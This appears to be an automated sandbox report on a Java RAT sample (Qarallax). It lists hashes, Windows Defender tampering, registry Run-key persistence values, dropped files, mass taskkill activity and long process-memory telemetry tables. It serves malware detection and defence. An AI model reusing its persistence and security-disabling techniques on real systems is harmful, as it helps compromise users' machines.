qarallax | ddc0264f82a81e5c3070a77887e7840f0fbde2949b742b74381fe8ec39daa9b8

Analysis

max time kernel
62s
max time network
65s
platform
windows10_x64
resource
win10v200722
submitted
06-08-2020 07:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

REN42159.jar
Size

401KB
MD5

dc91a54b2286a05af54711ba5139a897
SHA1

ef36e7172287d286e7465442209d23d0d14ebf2e
SHA256

ddc0264f82a81e5c3070a77887e7840f0fbde2949b742b74381fe8ec39daa9b8
SHA512

a46142c6df8d614db6a0225d73dd72d73fd64e0a89b43f7d5da10d552f70c2f9d4aa9854e1ee68214c2c7f70d890374bf2853fbfcc39ecabef30c2fe71a10037

Score

10^/10

evasion trojan persistence qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae10-57.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
3488	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WKBnewJ = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\tHFwB\\YIYZS.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\WKBnewJ = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\tHFwB\\YIYZS.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\tHFwB\Desktop.ini	java.exe
File created	C:\Users\Admin\tHFwB\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\tHFwB\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\tHFwB\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\pJjAo	java.exe
File opened for modification	C:\Windows\System32\pJjAo	java.exe

Kills process with taskkill 17 IoCs

evasion

pid	Process
4996	taskkill.exe
3892	taskkill.exe
5300	taskkill.exe
5424	taskkill.exe
4676	taskkill.exe
4228	taskkill.exe
4436	taskkill.exe
1156	taskkill.exe
4496	taskkill.exe
5236	taskkill.exe
5364	taskkill.exe
4356	taskkill.exe
2784	taskkill.exe
1316	taskkill.exe
4768	taskkill.exe
5172	taskkill.exe
5484	taskkill.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3020	powershell.exe
3020	powershell.exe
3020	powershell.exe
3020	powershell.exe

Suspicious use of AdjustPrivilegeToken 123 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2648	WMIC.exe
Token: SeSecurityPrivilege	2648	WMIC.exe
Token: SeTakeOwnershipPrivilege	2648	WMIC.exe
Token: SeLoadDriverPrivilege	2648	WMIC.exe
Token: SeSystemProfilePrivilege	2648	WMIC.exe
Token: SeSystemtimePrivilege	2648	WMIC.exe
Token: SeProfSingleProcessPrivilege	2648	WMIC.exe
Token: SeIncBasePriorityPrivilege	2648	WMIC.exe
Token: SeCreatePagefilePrivilege	2648	WMIC.exe
Token: SeBackupPrivilege	2648	WMIC.exe
Token: SeRestorePrivilege	2648	WMIC.exe
Token: SeShutdownPrivilege	2648	WMIC.exe
Token: SeDebugPrivilege	2648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2648	WMIC.exe
Token: SeRemoteShutdownPrivilege	2648	WMIC.exe
Token: SeUndockPrivilege	2648	WMIC.exe
Token: SeManageVolumePrivilege	2648	WMIC.exe
Token: 33	2648	WMIC.exe
Token: 34	2648	WMIC.exe
Token: 35	2648	WMIC.exe
Token: 36	2648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2648	WMIC.exe
Token: SeSecurityPrivilege	2648	WMIC.exe
Token: SeTakeOwnershipPrivilege	2648	WMIC.exe
Token: SeLoadDriverPrivilege	2648	WMIC.exe
Token: SeSystemProfilePrivilege	2648	WMIC.exe
Token: SeSystemtimePrivilege	2648	WMIC.exe
Token: SeProfSingleProcessPrivilege	2648	WMIC.exe
Token: SeIncBasePriorityPrivilege	2648	WMIC.exe
Token: SeCreatePagefilePrivilege	2648	WMIC.exe
Token: SeBackupPrivilege	2648	WMIC.exe
Token: SeRestorePrivilege	2648	WMIC.exe
Token: SeShutdownPrivilege	2648	WMIC.exe
Token: SeDebugPrivilege	2648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2648	WMIC.exe
Token: SeRemoteShutdownPrivilege	2648	WMIC.exe
Token: SeUndockPrivilege	2648	WMIC.exe
Token: SeManageVolumePrivilege	2648	WMIC.exe
Token: 33	2648	WMIC.exe
Token: 34	2648	WMIC.exe
Token: 35	2648	WMIC.exe
Token: 36	2648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3596	WMIC.exe
Token: SeSecurityPrivilege	3596	WMIC.exe
Token: SeTakeOwnershipPrivilege	3596	WMIC.exe
Token: SeLoadDriverPrivilege	3596	WMIC.exe
Token: SeSystemProfilePrivilege	3596	WMIC.exe
Token: SeSystemtimePrivilege	3596	WMIC.exe
Token: SeProfSingleProcessPrivilege	3596	WMIC.exe
Token: SeIncBasePriorityPrivilege	3596	WMIC.exe
Token: SeCreatePagefilePrivilege	3596	WMIC.exe
Token: SeBackupPrivilege	3596	WMIC.exe
Token: SeRestorePrivilege	3596	WMIC.exe
Token: SeShutdownPrivilege	3596	WMIC.exe
Token: SeDebugPrivilege	3596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3596	WMIC.exe
Token: SeRemoteShutdownPrivilege	3596	WMIC.exe
Token: SeUndockPrivilege	3596	WMIC.exe
Token: SeManageVolumePrivilege	3596	WMIC.exe
Token: 33	3596	WMIC.exe
Token: 34	3596	WMIC.exe
Token: 35	3596	WMIC.exe
Token: 36	3596	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3596	WMIC.exe
Token: SeSecurityPrivilege	3596	WMIC.exe
Token: SeTakeOwnershipPrivilege	3596	WMIC.exe
Token: SeLoadDriverPrivilege	3596	WMIC.exe
Token: SeSystemProfilePrivilege	3596	WMIC.exe
Token: SeSystemtimePrivilege	3596	WMIC.exe
Token: SeProfSingleProcessPrivilege	3596	WMIC.exe
Token: SeIncBasePriorityPrivilege	3596	WMIC.exe
Token: SeCreatePagefilePrivilege	3596	WMIC.exe
Token: SeBackupPrivilege	3596	WMIC.exe
Token: SeRestorePrivilege	3596	WMIC.exe
Token: SeShutdownPrivilege	3596	WMIC.exe
Token: SeDebugPrivilege	3596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3596	WMIC.exe
Token: SeRemoteShutdownPrivilege	3596	WMIC.exe
Token: SeUndockPrivilege	3596	WMIC.exe
Token: SeManageVolumePrivilege	3596	WMIC.exe
Token: 33	3596	WMIC.exe
Token: 34	3596	WMIC.exe
Token: 35	3596	WMIC.exe
Token: 36	3596	WMIC.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	1316	taskkill.exe
Token: SeDebugPrivilege	4676	taskkill.exe
Token: SeDebugPrivilege	4996	taskkill.exe
Token: SeDebugPrivilege	4228	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3020	powershell.exe
Token: SeSecurityPrivilege	3020	powershell.exe
Token: SeTakeOwnershipPrivilege	3020	powershell.exe
Token: SeLoadDriverPrivilege	3020	powershell.exe
Token: SeSystemProfilePrivilege	3020	powershell.exe
Token: SeSystemtimePrivilege	3020	powershell.exe
Token: SeProfSingleProcessPrivilege	3020	powershell.exe
Token: SeIncBasePriorityPrivilege	3020	powershell.exe
Token: SeCreatePagefilePrivilege	3020	powershell.exe
Token: SeBackupPrivilege	3020	powershell.exe
Token: SeRestorePrivilege	3020	powershell.exe
Token: SeShutdownPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeSystemEnvironmentPrivilege	3020	powershell.exe
Token: SeRemoteShutdownPrivilege	3020	powershell.exe
Token: SeUndockPrivilege	3020	powershell.exe
Token: SeManageVolumePrivilege	3020	powershell.exe
Token: 33	3020	powershell.exe
Token: 34	3020	powershell.exe
Token: 35	3020	powershell.exe
Token: 36	3020	powershell.exe
Token: SeDebugPrivilege	4436	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	4356	taskkill.exe
Token: SeDebugPrivilege	1156	taskkill.exe
Token: SeDebugPrivilege	4768	taskkill.exe
Token: SeDebugPrivilege	4496	taskkill.exe
Token: SeDebugPrivilege	5172	taskkill.exe
Token: SeDebugPrivilege	5236	taskkill.exe
Token: SeDebugPrivilege	5300	taskkill.exe
Token: SeDebugPrivilege	5364	taskkill.exe
Token: SeDebugPrivilege	5424	taskkill.exe
Token: SeDebugPrivilege	5484	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3488	java.exe

Suspicious use of WriteProcessMemory 398 IoCs

description	pid	Process	procid_target
PID 3488 wrote to memory of 1652	3488	java.exe	67
PID 3488 wrote to memory of 1652	3488	java.exe	67
PID 3488 wrote to memory of 2324	3488	java.exe	69
PID 3488 wrote to memory of 2324	3488	java.exe	69
PID 2324 wrote to memory of 2648	2324	cmd.exe	71
PID 2324 wrote to memory of 2648	2324	cmd.exe	71
PID 3488 wrote to memory of 2696	3488	java.exe	72
PID 3488 wrote to memory of 2696	3488	java.exe	72
PID 2696 wrote to memory of 3596	2696	cmd.exe	74
PID 2696 wrote to memory of 3596	2696	cmd.exe	74
PID 3488 wrote to memory of 3712	3488	java.exe	77
PID 3488 wrote to memory of 3712	3488	java.exe	77
PID 3488 wrote to memory of 3576	3488	java.exe	79
PID 3488 wrote to memory of 3576	3488	java.exe	79
PID 3488 wrote to memory of 3688	3488	java.exe	81
PID 3488 wrote to memory of 3688	3488	java.exe	81
PID 3488 wrote to memory of 2064	3488	java.exe	82
PID 3488 wrote to memory of 2064	3488	java.exe	82
PID 3488 wrote to memory of 3784	3488	java.exe	84
PID 3488 wrote to memory of 3784	3488	java.exe	84
PID 3488 wrote to memory of 852	3488	java.exe	86
PID 3488 wrote to memory of 852	3488	java.exe	86
PID 3488 wrote to memory of 812	3488	java.exe	88
PID 3488 wrote to memory of 812	3488	java.exe	88
PID 3488 wrote to memory of 1128	3488	java.exe	90
PID 3488 wrote to memory of 1128	3488	java.exe	90
PID 3488 wrote to memory of 2116	3488	java.exe	93
PID 3488 wrote to memory of 2116	3488	java.exe	93
PID 3488 wrote to memory of 3020	3488	java.exe	95
PID 3488 wrote to memory of 3020	3488	java.exe	95
PID 3488 wrote to memory of 4048	3488	java.exe	96
PID 3488 wrote to memory of 4048	3488	java.exe	96
PID 3488 wrote to memory of 3880	3488	java.exe	97
PID 3488 wrote to memory of 3880	3488	java.exe	97
PID 3488 wrote to memory of 1432	3488	java.exe	100
PID 3488 wrote to memory of 1432	3488	java.exe	100
PID 3488 wrote to memory of 2784	3488	java.exe	101
PID 3488 wrote to memory of 2784	3488	java.exe	101
PID 3488 wrote to memory of 2776	3488	java.exe	102
PID 3488 wrote to memory of 2776	3488	java.exe	102
PID 3488 wrote to memory of 1256	3488	java.exe	106
PID 3488 wrote to memory of 1256	3488	java.exe	106
PID 3488 wrote to memory of 1744	3488	java.exe	109
PID 3488 wrote to memory of 1744	3488	java.exe	109
PID 2116 wrote to memory of 1588	2116	cmd.exe	110
PID 2116 wrote to memory of 1588	2116	cmd.exe	110
PID 3488 wrote to memory of 3788	3488	java.exe	111
PID 3488 wrote to memory of 3788	3488	java.exe	111
PID 3488 wrote to memory of 1412	3488	java.exe	115
PID 3488 wrote to memory of 1080	3488	java.exe	114
PID 3488 wrote to memory of 1412	3488	java.exe	115
PID 3488 wrote to memory of 1080	3488	java.exe	114
PID 3488 wrote to memory of 1156	3488	java.exe	118
PID 3488 wrote to memory of 1156	3488	java.exe	118
PID 3488 wrote to memory of 3904	3488	java.exe	119
PID 3488 wrote to memory of 3904	3488	java.exe	119
PID 3488 wrote to memory of 2164	3488	java.exe	122
PID 3488 wrote to memory of 2164	3488	java.exe	122
PID 3488 wrote to memory of 404	3488	java.exe	123
PID 3488 wrote to memory of 404	3488	java.exe	123
PID 3488 wrote to memory of 3684	3488	java.exe	126
PID 3488 wrote to memory of 3684	3488	java.exe	126
PID 3488 wrote to memory of 1748	3488	java.exe	127
PID 3488 wrote to memory of 1748	3488	java.exe	127
PID 3488 wrote to memory of 2776	3488	java.exe	130
PID 3488 wrote to memory of 2776	3488	java.exe	130
PID 3488 wrote to memory of 3064	3488	java.exe	132
PID 3488 wrote to memory of 3064	3488	java.exe	132
PID 3488 wrote to memory of 1316	3488	java.exe	133
PID 3488 wrote to memory of 1316	3488	java.exe	133
PID 3488 wrote to memory of 1276	3488	java.exe	135
PID 3488 wrote to memory of 1276	3488	java.exe	135
PID 3488 wrote to memory of 3000	3488	java.exe	138
PID 3488 wrote to memory of 3000	3488	java.exe	138
PID 3488 wrote to memory of 3788	3488	java.exe	140
PID 3488 wrote to memory of 3788	3488	java.exe	140
PID 2116 wrote to memory of 1076	2116	cmd.exe	142
PID 2116 wrote to memory of 1076	2116	cmd.exe	142
PID 3488 wrote to memory of 4112	3488	java.exe	143
PID 3488 wrote to memory of 4112	3488	java.exe	143
PID 3488 wrote to memory of 4208	3488	java.exe	145
PID 3488 wrote to memory of 4208	3488	java.exe	145
PID 3488 wrote to memory of 4304	3488	java.exe	148
PID 3488 wrote to memory of 4304	3488	java.exe	148
PID 3488 wrote to memory of 4432	3488	java.exe	150
PID 3488 wrote to memory of 4432	3488	java.exe	150
PID 3488 wrote to memory of 4492	3488	java.exe	152
PID 3488 wrote to memory of 4492	3488	java.exe	152
PID 3488 wrote to memory of 4532	3488	java.exe	153
PID 3488 wrote to memory of 4532	3488	java.exe	153
PID 3488 wrote to memory of 4612	3488	java.exe	157
PID 3488 wrote to memory of 4612	3488	java.exe	157
PID 3488 wrote to memory of 4676	3488	java.exe	159
PID 3488 wrote to memory of 4676	3488	java.exe	159
PID 3488 wrote to memory of 4688	3488	java.exe	160
PID 3488 wrote to memory of 4688	3488	java.exe	160
PID 4688 wrote to memory of 4844	4688	cmd.exe	163
PID 4688 wrote to memory of 4844	4688	cmd.exe	163
PID 4688 wrote to memory of 4904	4688	cmd.exe	164
PID 4688 wrote to memory of 4904	4688	cmd.exe	164
PID 3488 wrote to memory of 4932	3488	java.exe	165
PID 3488 wrote to memory of 4932	3488	java.exe	165
PID 4932 wrote to memory of 4968	4932	cmd.exe	167
PID 4932 wrote to memory of 4968	4932	cmd.exe	167
PID 3488 wrote to memory of 4996	3488	java.exe	168
PID 3488 wrote to memory of 4996	3488	java.exe	168
PID 4932 wrote to memory of 5036	4932	cmd.exe	170
PID 4932 wrote to memory of 5036	4932	cmd.exe	170
PID 3488 wrote to memory of 5080	3488	java.exe	171
PID 3488 wrote to memory of 5080	3488	java.exe	171
PID 5080 wrote to memory of 5116	5080	cmd.exe	173
PID 5080 wrote to memory of 5116	5080	cmd.exe	173
PID 5080 wrote to memory of 1244	5080	cmd.exe	174
PID 5080 wrote to memory of 1244	5080	cmd.exe	174
PID 3488 wrote to memory of 4020	3488	java.exe	175
PID 3488 wrote to memory of 4020	3488	java.exe	175
PID 4020 wrote to memory of 3904	4020	cmd.exe	177
PID 4020 wrote to memory of 3904	4020	cmd.exe	177
PID 4020 wrote to memory of 4128	4020	cmd.exe	178
PID 4020 wrote to memory of 4128	4020	cmd.exe	178
PID 3488 wrote to memory of 1008	3488	java.exe	179
PID 3488 wrote to memory of 1008	3488	java.exe	179
PID 3488 wrote to memory of 4228	3488	java.exe	181
PID 3488 wrote to memory of 4228	3488	java.exe	181
PID 1008 wrote to memory of 4192	1008	cmd.exe	183
PID 1008 wrote to memory of 4192	1008	cmd.exe	183
PID 1008 wrote to memory of 2776	1008	cmd.exe	184
PID 1008 wrote to memory of 2776	1008	cmd.exe	184
PID 3488 wrote to memory of 2788	3488	java.exe	185
PID 3488 wrote to memory of 2788	3488	java.exe	185
PID 2788 wrote to memory of 772	2788	cmd.exe	187
PID 2788 wrote to memory of 772	2788	cmd.exe	187
PID 2788 wrote to memory of 1236	2788	cmd.exe	188
PID 2788 wrote to memory of 1236	2788	cmd.exe	188
PID 3488 wrote to memory of 4312	3488	java.exe	189
PID 3488 wrote to memory of 4312	3488	java.exe	189
PID 4312 wrote to memory of 4268	4312	cmd.exe	191
PID 4312 wrote to memory of 4268	4312	cmd.exe	191
PID 4312 wrote to memory of 3064	4312	cmd.exe	192
PID 4312 wrote to memory of 3064	4312	cmd.exe	192
PID 3488 wrote to memory of 1360	3488	java.exe	193
PID 3488 wrote to memory of 1360	3488	java.exe	193
PID 1360 wrote to memory of 4152	1360	cmd.exe	195
PID 1360 wrote to memory of 4152	1360	cmd.exe	195
PID 1360 wrote to memory of 4284	1360	cmd.exe	196
PID 1360 wrote to memory of 4284	1360	cmd.exe	196
PID 3488 wrote to memory of 4264	3488	java.exe	197
PID 3488 wrote to memory of 4264	3488	java.exe	197
PID 4264 wrote to memory of 4512	4264	cmd.exe	199
PID 4264 wrote to memory of 4512	4264	cmd.exe	199
PID 4264 wrote to memory of 4180	4264	cmd.exe	200
PID 4264 wrote to memory of 4180	4264	cmd.exe	200
PID 3488 wrote to memory of 4292	3488	java.exe	201
PID 3488 wrote to memory of 4292	3488	java.exe	201
PID 4292 wrote to memory of 4464	4292	cmd.exe	203
PID 4292 wrote to memory of 4464	4292	cmd.exe	203
PID 4292 wrote to memory of 2248	4292	cmd.exe	204
PID 4292 wrote to memory of 2248	4292	cmd.exe	204
PID 3488 wrote to memory of 4412	3488	java.exe	205
PID 3488 wrote to memory of 4412	3488	java.exe	205
PID 4412 wrote to memory of 4224	4412	cmd.exe	207
PID 4412 wrote to memory of 4224	4412	cmd.exe	207
PID 3488 wrote to memory of 4436	3488	java.exe	208
PID 3488 wrote to memory of 4436	3488	java.exe	208
PID 4412 wrote to memory of 4496	4412	cmd.exe	210
PID 4412 wrote to memory of 4496	4412	cmd.exe	210
PID 3488 wrote to memory of 2312	3488	java.exe	211
PID 3488 wrote to memory of 2312	3488	java.exe	211
PID 2312 wrote to memory of 4752	2312	cmd.exe	213
PID 2312 wrote to memory of 4752	2312	cmd.exe	213
PID 2312 wrote to memory of 4632	2312	cmd.exe	215
PID 2312 wrote to memory of 4632	2312	cmd.exe	215
PID 3488 wrote to memory of 4584	3488	java.exe	216
PID 3488 wrote to memory of 4584	3488	java.exe	216
PID 4584 wrote to memory of 1316	4584	cmd.exe	218
PID 4584 wrote to memory of 1316	4584	cmd.exe	218
PID 4584 wrote to memory of 4864	4584	cmd.exe	219
PID 4584 wrote to memory of 4864	4584	cmd.exe	219
PID 3488 wrote to memory of 4680	3488	java.exe	220
PID 3488 wrote to memory of 4680	3488	java.exe	220
PID 4680 wrote to memory of 4744	4680	cmd.exe	222
PID 4680 wrote to memory of 4744	4680	cmd.exe	222
PID 4680 wrote to memory of 3372	4680	cmd.exe	223
PID 4680 wrote to memory of 3372	4680	cmd.exe	223
PID 3488 wrote to memory of 1144	3488	java.exe	224
PID 3488 wrote to memory of 1144	3488	java.exe	224
PID 1144 wrote to memory of 4924	1144	cmd.exe	226
PID 1144 wrote to memory of 4924	1144	cmd.exe	226
PID 1144 wrote to memory of 4948	1144	cmd.exe	227
PID 1144 wrote to memory of 4948	1144	cmd.exe	227
PID 3488 wrote to memory of 4972	3488	java.exe	228
PID 3488 wrote to memory of 4972	3488	java.exe	228
PID 4972 wrote to memory of 5096	4972	cmd.exe	230
PID 4972 wrote to memory of 5096	4972	cmd.exe	230
PID 4972 wrote to memory of 612	4972	cmd.exe	231
PID 4972 wrote to memory of 612	4972	cmd.exe	231
PID 3488 wrote to memory of 5056	3488	java.exe	232
PID 3488 wrote to memory of 5056	3488	java.exe	232
PID 5056 wrote to memory of 5016	5056	cmd.exe	234
PID 5056 wrote to memory of 5016	5056	cmd.exe	234
PID 5056 wrote to memory of 1904	5056	cmd.exe	235
PID 5056 wrote to memory of 1904	5056	cmd.exe	235
PID 3488 wrote to memory of 3856	3488	java.exe	236
PID 3488 wrote to memory of 3856	3488	java.exe	236
PID 3488 wrote to memory of 3892	3488	java.exe	238
PID 3488 wrote to memory of 3892	3488	java.exe	238
PID 3856 wrote to memory of 1432	3856	cmd.exe	239
PID 3856 wrote to memory of 1432	3856	cmd.exe	239
PID 3856 wrote to memory of 1148	3856	cmd.exe	241
PID 3856 wrote to memory of 1148	3856	cmd.exe	241
PID 3488 wrote to memory of 2776	3488	java.exe	242
PID 3488 wrote to memory of 2776	3488	java.exe	242
PID 2776 wrote to memory of 1268	2776	cmd.exe	244
PID 2776 wrote to memory of 1268	2776	cmd.exe	244
PID 2776 wrote to memory of 2608	2776	cmd.exe	245
PID 2776 wrote to memory of 2608	2776	cmd.exe	245
PID 3488 wrote to memory of 1608	3488	java.exe	246
PID 3488 wrote to memory of 1608	3488	java.exe	246
PID 1608 wrote to memory of 4160	1608	cmd.exe	248
PID 1608 wrote to memory of 4160	1608	cmd.exe	248
PID 1608 wrote to memory of 3064	1608	cmd.exe	249
PID 1608 wrote to memory of 3064	1608	cmd.exe	249
PID 3488 wrote to memory of 4372	3488	java.exe	250
PID 3488 wrote to memory of 4372	3488	java.exe	250
PID 4372 wrote to memory of 4332	4372	cmd.exe	252
PID 4372 wrote to memory of 4332	4372	cmd.exe	252
PID 4372 wrote to memory of 4520	4372	cmd.exe	253
PID 4372 wrote to memory of 4520	4372	cmd.exe	253
PID 3488 wrote to memory of 4180	3488	java.exe	254
PID 3488 wrote to memory of 4180	3488	java.exe	254
PID 4180 wrote to memory of 4560	4180	cmd.exe	256
PID 4180 wrote to memory of 4560	4180	cmd.exe	256
PID 3488 wrote to memory of 4356	3488	java.exe	257
PID 3488 wrote to memory of 4356	3488	java.exe	257
PID 4180 wrote to memory of 4504	4180	cmd.exe	259
PID 4180 wrote to memory of 4504	4180	cmd.exe	259
PID 3488 wrote to memory of 4616	3488	java.exe	260
PID 3488 wrote to memory of 4616	3488	java.exe	260
PID 4616 wrote to memory of 4540	4616	cmd.exe	262
PID 4616 wrote to memory of 4540	4616	cmd.exe	262
PID 4616 wrote to memory of 4728	4616	cmd.exe	263
PID 4616 wrote to memory of 4728	4616	cmd.exe	263
PID 3488 wrote to memory of 4168	3488	java.exe	264
PID 3488 wrote to memory of 4168	3488	java.exe	264
PID 4168 wrote to memory of 4864	4168	cmd.exe	266
PID 4168 wrote to memory of 4864	4168	cmd.exe	266
PID 4168 wrote to memory of 2784	4168	cmd.exe	267
PID 4168 wrote to memory of 2784	4168	cmd.exe	267
PID 3488 wrote to memory of 4812	3488	java.exe	268
PID 3488 wrote to memory of 4812	3488	java.exe	268
PID 4812 wrote to memory of 4916	4812	cmd.exe	270
PID 4812 wrote to memory of 4916	4812	cmd.exe	270
PID 4812 wrote to memory of 5004	4812	cmd.exe	271
PID 4812 wrote to memory of 5004	4812	cmd.exe	271
PID 3488 wrote to memory of 856	3488	java.exe	272
PID 3488 wrote to memory of 856	3488	java.exe	272
PID 856 wrote to memory of 4148	856	cmd.exe	274
PID 856 wrote to memory of 4148	856	cmd.exe	274
PID 856 wrote to memory of 4804	856	cmd.exe	275
PID 856 wrote to memory of 4804	856	cmd.exe	275
PID 3488 wrote to memory of 4888	3488	java.exe	276
PID 3488 wrote to memory of 4888	3488	java.exe	276
PID 4888 wrote to memory of 584	4888	cmd.exe	278
PID 4888 wrote to memory of 584	4888	cmd.exe	278
PID 4888 wrote to memory of 2120	4888	cmd.exe	279
PID 4888 wrote to memory of 2120	4888	cmd.exe	279
PID 3488 wrote to memory of 5116	3488	java.exe	280
PID 3488 wrote to memory of 5116	3488	java.exe	280
PID 3488 wrote to memory of 1156	3488	java.exe	282
PID 3488 wrote to memory of 1156	3488	java.exe	282
PID 5116 wrote to memory of 4196	5116	cmd.exe	284
PID 5116 wrote to memory of 4196	5116	cmd.exe	284
PID 5116 wrote to memory of 4192	5116	cmd.exe	285
PID 5116 wrote to memory of 4192	5116	cmd.exe	285
PID 3488 wrote to memory of 988	3488	java.exe	286
PID 3488 wrote to memory of 988	3488	java.exe	286
PID 988 wrote to memory of 2668	988	cmd.exe	288
PID 988 wrote to memory of 2668	988	cmd.exe	288
PID 988 wrote to memory of 1236	988	cmd.exe	289
PID 988 wrote to memory of 1236	988	cmd.exe	289
PID 3488 wrote to memory of 1392	3488	java.exe	290
PID 3488 wrote to memory of 1392	3488	java.exe	290
PID 1392 wrote to memory of 3788	1392	cmd.exe	292
PID 1392 wrote to memory of 3788	1392	cmd.exe	292
PID 1392 wrote to memory of 4332	1392	cmd.exe	293
PID 1392 wrote to memory of 4332	1392	cmd.exe	293
PID 3488 wrote to memory of 4520	3488	java.exe	294
PID 3488 wrote to memory of 4520	3488	java.exe	294
PID 4520 wrote to memory of 4640	4520	cmd.exe	296
PID 4520 wrote to memory of 4640	4520	cmd.exe	296
PID 4520 wrote to memory of 4504	4520	cmd.exe	297
PID 4520 wrote to memory of 4504	4520	cmd.exe	297
PID 3488 wrote to memory of 4436	3488	java.exe	298
PID 3488 wrote to memory of 4436	3488	java.exe	298
PID 4436 wrote to memory of 4532	4436	cmd.exe	300
PID 4436 wrote to memory of 4532	4436	cmd.exe	300
PID 4436 wrote to memory of 4788	4436	cmd.exe	301
PID 4436 wrote to memory of 4788	4436	cmd.exe	301
PID 3488 wrote to memory of 4728	3488	java.exe	302
PID 3488 wrote to memory of 4728	3488	java.exe	302
PID 4728 wrote to memory of 4676	4728	cmd.exe	304
PID 4728 wrote to memory of 4676	4728	cmd.exe	304
PID 4728 wrote to memory of 4848	4728	cmd.exe	305
PID 4728 wrote to memory of 4848	4728	cmd.exe	305
PID 3488 wrote to memory of 4980	3488	java.exe	306
PID 3488 wrote to memory of 4980	3488	java.exe	306
PID 3488 wrote to memory of 4768	3488	java.exe	309
PID 3488 wrote to memory of 4768	3488	java.exe	309
PID 4980 wrote to memory of 4140	4980	cmd.exe	308
PID 4980 wrote to memory of 4140	4980	cmd.exe	308
PID 4980 wrote to memory of 584	4980	cmd.exe	311
PID 4980 wrote to memory of 584	4980	cmd.exe	311
PID 3488 wrote to memory of 3880	3488	java.exe	312
PID 3488 wrote to memory of 3880	3488	java.exe	312
PID 3880 wrote to memory of 4024	3880	cmd.exe	314
PID 3880 wrote to memory of 4024	3880	cmd.exe	314
PID 3880 wrote to memory of 2608	3880	cmd.exe	315
PID 3880 wrote to memory of 2608	3880	cmd.exe	315
PID 3488 wrote to memory of 1000	3488	java.exe	316
PID 3488 wrote to memory of 1000	3488	java.exe	316
PID 1000 wrote to memory of 4992	1000	cmd.exe	318
PID 1000 wrote to memory of 4992	1000	cmd.exe	318
PID 1000 wrote to memory of 1236	1000	cmd.exe	319
PID 1000 wrote to memory of 1236	1000	cmd.exe	319
PID 3488 wrote to memory of 4480	3488	java.exe	320
PID 3488 wrote to memory of 4480	3488	java.exe	320
PID 4480 wrote to memory of 4588	4480	cmd.exe	322
PID 4480 wrote to memory of 4588	4480	cmd.exe	322
PID 4480 wrote to memory of 4640	4480	cmd.exe	323
PID 4480 wrote to memory of 4640	4480	cmd.exe	323
PID 3488 wrote to memory of 4504	3488	java.exe	324
PID 3488 wrote to memory of 4504	3488	java.exe	324
PID 4504 wrote to memory of 1076	4504	cmd.exe	326
PID 4504 wrote to memory of 1076	4504	cmd.exe	326
PID 4504 wrote to memory of 68	4504	cmd.exe	327
PID 4504 wrote to memory of 68	4504	cmd.exe	327
PID 3488 wrote to memory of 4924	3488	java.exe	328
PID 3488 wrote to memory of 4924	3488	java.exe	328
PID 4924 wrote to memory of 3792	4924	cmd.exe	330
PID 4924 wrote to memory of 3792	4924	cmd.exe	330
PID 4924 wrote to memory of 5008	4924	cmd.exe	331
PID 4924 wrote to memory of 5008	4924	cmd.exe	331
PID 3488 wrote to memory of 1148	3488	java.exe	332
PID 3488 wrote to memory of 1148	3488	java.exe	332
PID 1148 wrote to memory of 4768	1148	cmd.exe	334
PID 1148 wrote to memory of 4768	1148	cmd.exe	334
PID 1148 wrote to memory of 5052	1148	cmd.exe	335
PID 1148 wrote to memory of 5052	1148	cmd.exe	335
PID 3488 wrote to memory of 1720	3488	java.exe	336
PID 3488 wrote to memory of 1720	3488	java.exe	336
PID 1720 wrote to memory of 2668	1720	cmd.exe	338
PID 1720 wrote to memory of 2668	1720	cmd.exe	338
PID 1720 wrote to memory of 4380	1720	cmd.exe	339
PID 1720 wrote to memory of 4380	1720	cmd.exe	339
PID 3488 wrote to memory of 4512	3488	java.exe	340
PID 3488 wrote to memory of 4512	3488	java.exe	340
PID 4512 wrote to memory of 4700	4512	cmd.exe	342
PID 4512 wrote to memory of 4700	4512	cmd.exe	342
PID 4512 wrote to memory of 4884	4512	cmd.exe	343
PID 4512 wrote to memory of 4884	4512	cmd.exe	343
